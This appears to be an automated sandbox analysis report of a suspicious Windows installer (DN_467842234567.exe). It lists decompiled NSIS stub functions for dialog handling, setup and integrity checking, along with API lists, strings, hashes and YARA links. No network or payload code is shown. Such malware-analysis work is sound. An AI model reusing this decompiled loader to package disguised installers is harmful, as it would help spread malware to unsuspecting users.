						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133) {
							_t142 =  *0x42e3f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b0a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                            0x004039b9
                                            0x004039c2
                                            0x00403b03
                                            0x00403b07
                                            0x00403b0b
                                            0x00403b0d
                                            0x00403b12
                                            0x00403b1d
                                            0x00403b28
                                            0x00403b2d
                                            0x00403b2f
                                            0x00403b31
                                            0x00403b34
                                            0x00403b39
                                            0x00403b47
                                            0x00403b54
                                            0x00403b5b
                                            0x00403b5b
                                            0x00403b5c
                                            0x00403b5c
                                            0x00403b61
                                            0x00403b67
                                            0x00403b6e
                                            0x00403b74
                                            0x00403b76
                                            0x00403bb6
                                            0x00403bbb
                                            0x00403bc0
                                            0x00403bc0
                                            0x00403bc5
                                            0x00403bce
                                            0x00403bd0
                                            0x00403bd5
                                            0x00403bdb
                                            0x00403bdf
                                            0x00403bdf
                                            0x00403be4
                                            0x00403bea
                                            0x00000000
                                            0x00000000
                                            0x00403bf0
                                            0x00403bf5
                                            0x00403bfb
                                            0x00000000
                                            0x00000000
                                            0x00403c04
                                            0x00403c0c
                                            0x00403c11
                                            0x00403c14
                                            0x00403c1a
                                            0x00403c1f
                                            0x00403c22
                                            0x00403c28
                                            0x00403c2d
                                            0x00403c30
                                            0x00403c36
                                            0x00403c3e
                                            0x00403c44
                                            0x00403c4a
                                            0x00403c4e
                                            0x00403c55
                                            0x00403c55
                                            0x00403c55
                                            0x00403c5f
                                            0x00403c71
                                            0x00403c7d
                                            0x00403c82
                                            0x00403c8c
                                            0x00403c92
                                            0x00403c94
                                            0x00403c99
                                            0x00403c96
                                            0x00403c96
                                            0x00403c96
                                            0x00403ca9
                                            0x00403cc1
                                            0x00403cc3
                                            0x00403cc9
                                            0x00403cde
                                            0x00403ccb
                                            0x00403cd4
                                            0x00403cd6
                                            0x00403cd6
                                            0x00403ce4
                                            0x00403cf4
                                            0x00403d05
                                            0x00403d0c
                                            0x00403d12
                                            0x00403d16
                                            0x00403d1b
                                            0x00403d1d
                                            0x00000000
                                            0x00403d23
                                            0x00403d23
                                            0x00403d25
                                            0x00000000
                                            0x00000000
                                            0x00403d2b
                                            0x00403d2f
                                            0x00403d54
                                            0x00403d5a
                                            0x00403d60
                                            0x00403d62
                                            0x00000000
                                            0x00000000
                                            0x00403d88
                                            0x00403d8e
                                            0x00403d90
                                            0x00403d95
                                            0x00000000
                                            0x00000000
                                            0x00403d9b
                                            0x00403d9e
                                            0x00403da1
                                            0x00403db8
                                            0x00403dc4
                                            0x00403ddd
                                            0x00403de3
                                            0x00403de7
                                            0x00403dec
                                            0x00403df2
                                            0x00000000
                                            0x00000000
                                            0x00403dfc
                                            0x00403e07
                                            0x00000000
                                            0x00403e07
                                            0x00403d31
                                            0x00403d37
                                            0x00000000
                                            0x00000000
                                            0x00403d3d
                                            0x00403d43
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403d49
                                            0x00403d1d
                                            0x00403e14
                                            0x00403e20
                                            0x00403e27
                                            0x00000000
                                            0x00403b78
                                            0x00403b78
                                            0x00403b7b
                                            0x00403bae
                                            0x00403bae
                                            0x00403bb0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403bb0
                                            0x00403b7d
                                            0x00403b81
                                            0x00403b86
                                            0x00403b88
                                            0x00000000
                                            0x00000000
                                            0x00403b98
                                            0x00403ba0
                                            0x00000000
                                            0x00403ba6
                                            0x004039d4
                                            0x004039d4
                                            0x004039d8
                                            0x004039dd
                                            0x004039ec
                                            0x004039ec
                                            0x004039f5
                                            0x004039fe
                                            0x00403a09
                                            0x00403a09
                                            0x00403a15
                                            0x00403a31
                                            0x00403a34
                                            0x00403a47
                                            0x00403a4d
                                            0x00403af0
                                            0x00000000
                                            0x00403af9
                                            0x00403a53
                                            0x00403a60
                                            0x00403a62
                                            0x00403a64
                                            0x00403a83
                                            0x00403a83
                                            0x00403a86
                                            0x00403a8b
                                            0x00403a8e
                                            0x00403a9e
                                            0x00403a9f
                                            0x00403aa1
                                            0x00403ad7
                                            0x00403aea
                                            0x00000000
                                            0x00403aea
                                            0x00403aa3
                                            0x00403aa9
                                            0x00403ac2
                                            0x00403ac7
                                            0x00403ac9
                                            0x00000000
                                            0x00000000
                                            0x00403acb
                                            0x00403ab7
                                            0x00403ab7
                                            0x00403ab9
                                            0x00403ab9
                                            0x00000000
                                            0x00403ab9
                                            0x00403aac
                                            0x00403ab1
                                            0x00000000
                                            0x00403ab1
                                            0x00403a90
                                            0x00403a96
                                            0x00000000
                                            0x00000000
                                            0x00403a98
                                            0x00000000
                                            0x00403a98
                                            0x00403a88
                                            0x00000000
                                            0x00403a88
                                            0x00403a6e
                                            0x00403a75
                                            0x00403a7b
                                            0x00403a7d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403a7d
                                            0x00403a39
                                            0x00000000
                                            0x00403a17
                                            0x00403a1d
                                            0x00403a27
                                            0x00403e2d
                                            0x00403e33
                                            0x00403e35
                                            0x00403e3b
                                            0x00403e40
                                            0x00403e46
                                            0x00403e46
                                            0x00403e3b
                                            0x00403e50
                                            0x00000000
                                            0x00403e50
                                            0x00403a15

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                            • ShowWindow.USER32(?), ref: 00403A09
                                            • DestroyWindow.USER32 ref: 00403A1D
                                            • SetWindowLongA.USER32 ref: 00403A39
                                            • GetDlgItem.USER32 ref: 00403A5A
                                            • SendMessageA.USER32 ref: 00403A6E
                                            • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                            • GetDlgItem.USER32 ref: 00403B23
                                            • GetDlgItem.USER32 ref: 00403B2D
                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                                            • SendMessageA.USER32 ref: 00403B98
                                            • GetDlgItem.USER32 ref: 00403C3E
                                            • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                            • EnableWindow.USER32(?,?), ref: 00403C71
                                            • EnableWindow.USER32(?,?), ref: 00403C8C
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                            • EnableMenuItem.USER32 ref: 00403CA9
                                            • SendMessageA.USER32 ref: 00403CC1
                                            • SendMessageA.USER32 ref: 00403CD4
                                            • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,hyeatlxkvdhyymhha Setup), ref: 00403CFD
                                            • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                            • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                            Strings
                                            • hyeatlxkvdhyymhha Setup, xrefs: 00403CEE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                            • String ID: hyeatlxkvdhyymhha Setup
                                            • API String ID: 4050669955-237821489
                                            • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                            • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                            • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                            • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040361A, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30; // 0x5f5d20
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					"1033" = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405B25("1033",  *_t20() & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				_t24 =  *0x42ec38; // 0x80
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42eca0 = _t24 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040579B(_t96, _t84) == 0) {
						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5); // executed
							_t37 = E00405EE9("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t39 =  *0x42e400; // 0x0
							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20; // 0x400000
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 = _t76;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x42ec58; // 0x5fbaf8
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
					_t62 =  *0x42dbc0; // 0x54
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(_t84, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                            0x00403620
                                            0x00403629
                                            0x00403630
                                            0x00403632
                                            0x00403646
                                            0x00403658
                                            0x00403662
                                            0x00403667
                                            0x0040366d
                                            0x00403680
                                            0x00403680
                                            0x0040368b
                                            0x00403634
                                            0x0040363f
                                            0x0040363f
                                            0x00403690
                                            0x00403695
                                            0x0040369a
                                            0x004036a3
                                            0x004036a8
                                            0x004036b9
                                            0x00403740
                                            0x00403748
                                            0x00403751
                                            0x00403751
                                            0x00403767
                                            0x0040376d
                                            0x0040377b
                                            0x0040380a
                                            0x00403812
                                            0x0040381c
                                            0x00403821
                                            0x00403827
                                            0x004038b1
                                            0x004038b6
                                            0x004038b8
                                            0x004038d4
                                            0x00000000
                                            0x004038d4
                                            0x004038ba
                                            0x004038c0
                                            0x004038c8
                                            0x004038c8
                                            0x00000000
                                            0x004038c0
                                            0x00403835
                                            0x00403840
                                            0x00403845
                                            0x00403847
                                            0x0040384e
                                            0x0040384e
                                            0x00403859
                                            0x00403861
                                            0x00403863
                                            0x00403865
                                            0x0040386e
                                            0x00403871
                                            0x00403877
                                            0x00403877
                                            0x0040387d
                                            0x00403896
                                            0x004038a7
                                            0x00000000
                                            0x004038ac
                                            0x00403814
                                            0x00403816
                                            0x00000000
                                            0x00403781
                                            0x00403781
                                            0x00403787
                                            0x00403791
                                            0x00403799
                                            0x004037a3
                                            0x004037a9
                                            0x004037b7
                                            0x004038d9
                                            0x004038d9
                                            0x00000000
                                            0x004038d9
                                            0x004037bd
                                            0x004037c6
                                            0x00403805
                                            0x00000000
                                            0x00403805
                                            0x004036bf
                                            0x004036bf
                                            0x004036c4
                                            0x00000000
                                            0x00000000
                                            0x004036c9
                                            0x004036ce
                                            0x004036de
                                            0x004036e3
                                            0x004036ea
                                            0x00000000
                                            0x00000000
                                            0x004036ee
                                            0x004036f0
                                            0x004036fd
                                            0x004036fd
                                            0x00403705
                                            0x0040370b
                                            0x00403733
                                            0x0040373b
                                            0x00000000
                                            0x0040371d
                                            0x0040371e
                                            0x00403727
                                            0x0040372d
                                            0x0040372e
                                            0x00000000
                                            0x0040372e
                                            0x00403729
                                            0x0040372b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040372b
                                            0x0040370b

                                            APIs
                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                            • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\DN_467842234567.exe" ,00000000), ref: 0040368B
                                            • lstrlenA.KERNEL32(TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                            • lstrcmpiA.KERNEL32(?,.exe,TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                                            • GetFileAttributesA.KERNEL32(TclpOwkq), ref: 0040371E
                                            • LoadImageA.USER32 ref: 00403767
                                              • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                            • RegisterClassA.USER32 ref: 004037AE
                                            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                            • CreateWindowExA.USER32 ref: 004037FF
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                            • GetClassInfoA.USER32 ref: 00403861
                                            • GetClassInfoA.USER32 ref: 0040386E
                                            • RegisterClassA.USER32 ref: 00403877
                                            • DialogBoxParamA.USER32 ref: 00403896
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: ]_$"C:\Users\user\Desktop\DN_467842234567.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$TclpOwkq$_Nb
                                            • API String ID: 1975747703-499190832
                                            • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                            • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                            • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                            • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402C55, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\jones\\Desktop\\DN_467842234567.exe";
				 *0x42ec2c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\DN_467842234567.exe", 0x400);
				_t89 = E0040589E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\jones\\Desktop";
				E00405BC7("C:\\Users\\jones\\Desktop", _t91);
				E00405BC7(0x436000, E00405701(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x42ec34 - _t82; // 0x8800
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ec34; // 0x8800
						E004030E2(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
								__eflags =  *0x42ec3c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040585F("L^_", _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					_t65 = E004030B0( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ec34; // 0x8800
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B0(0x420c50, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ec34;
						if( *0x42ec34 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414c40; // 0x8800
						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ec34 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428c50;
						if(_t93 <  *0x428c50) {
							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                            0x00402c5d
                                            0x00402c60
                                            0x00402c63
                                            0x00402c66
                                            0x00402c6c
                                            0x00402c7d
                                            0x00402c82
                                            0x00402c95
                                            0x00402c9a
                                            0x00402c9d
                                            0x00402ca3
                                            0x00000000
                                            0x00402ca5
                                            0x00402cb0
                                            0x00402cb6
                                            0x00402cc7
                                            0x00402cce
                                            0x00402cd4
                                            0x00402cd6
                                            0x00402cdb
                                            0x00402cdd
                                            0x00402dca
                                            0x00402dcc
                                            0x00402dd1
                                            0x00402dd8
                                            0x00000000
                                            0x00000000
                                            0x00402dda
                                            0x00402ddd
                                            0x00402e01
                                            0x00402e06
                                            0x00402e0c
                                            0x00402e0e
                                            0x00402e17
                                            0x00402e1c
                                            0x00402e1f
                                            0x00402e20
                                            0x00402e21
                                            0x00402e23
                                            0x00402e28
                                            0x00402e2b
                                            0x00402e3e
                                            0x00402e42
                                            0x00402e4a
                                            0x00402e4f
                                            0x00402e51
                                            0x00402e51
                                            0x00402e51
                                            0x00402e59
                                            0x00402e59
                                            0x00402e5c
                                            0x00402e5d
                                            0x00402e5d
                                            0x00402e60
                                            0x00402e62
                                            0x00402e62
                                            0x00402e62
                                            0x00402e6c
                                            0x00402e72
                                            0x00402e80
                                            0x00402e85
                                            0x00000000
                                            0x00402e85
                                            0x00000000
                                            0x00402e2b
                                            0x00402de5
                                            0x00402df0
                                            0x00402df5
                                            0x00402df7
                                            0x00000000
                                            0x00000000
                                            0x00402dfc
                                            0x00402dff
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402ce3
                                            0x00402ce8
                                            0x00402ce8
                                            0x00402ced
                                            0x00402cf1
                                            0x00402cf8
                                            0x00402cfd
                                            0x00402cff
                                            0x00402d01
                                            0x00402d01
                                            0x00402d05
                                            0x00402d0a
                                            0x00402d0c
                                            0x00402e36
                                            0x00402e2d
                                            0x00000000
                                            0x00402e2d
                                            0x00402d12
                                            0x00402d19
                                            0x00402d95
                                            0x00402d99
                                            0x00402d9d
                                            0x00402da2
                                            0x00000000
                                            0x00402d99
                                            0x00402d22
                                            0x00402d27
                                            0x00402d2a
                                            0x00402d2f
                                            0x00000000
                                            0x00000000
                                            0x00402d31
                                            0x00402d38
                                            0x00000000
                                            0x00000000
                                            0x00402d3a
                                            0x00402d41
                                            0x00000000
                                            0x00000000
                                            0x00402d43
                                            0x00402d4a
                                            0x00000000
                                            0x00000000
                                            0x00402d4c
                                            0x00402d53
                                            0x00000000
                                            0x00000000
                                            0x00402d55
                                            0x00402d5b
                                            0x00402d64
                                            0x00402d6a
                                            0x00402d6d
                                            0x00402d6f
                                            0x00402d75
                                            0x00000000
                                            0x00000000
                                            0x00402d7b
                                            0x00402d7f
                                            0x00402d87
                                            0x00402d87
                                            0x00402d8a
                                            0x00402d8d
                                            0x00402d8f
                                            0x00402d91
                                            0x00402d91
                                            0x00000000
                                            0x00402d8f
                                            0x00402d81
                                            0x00402d85
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402da3
                                            0x00402da3
                                            0x00402da9
                                            0x00402db5
                                            0x00402db5
                                            0x00402db8
                                            0x00402dbe
                                            0x00402dc0
                                            0x00402dc0
                                            0x00402dc8
                                            0x00402dc8
                                            0x00000000
                                            0x00402dc8

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402C66
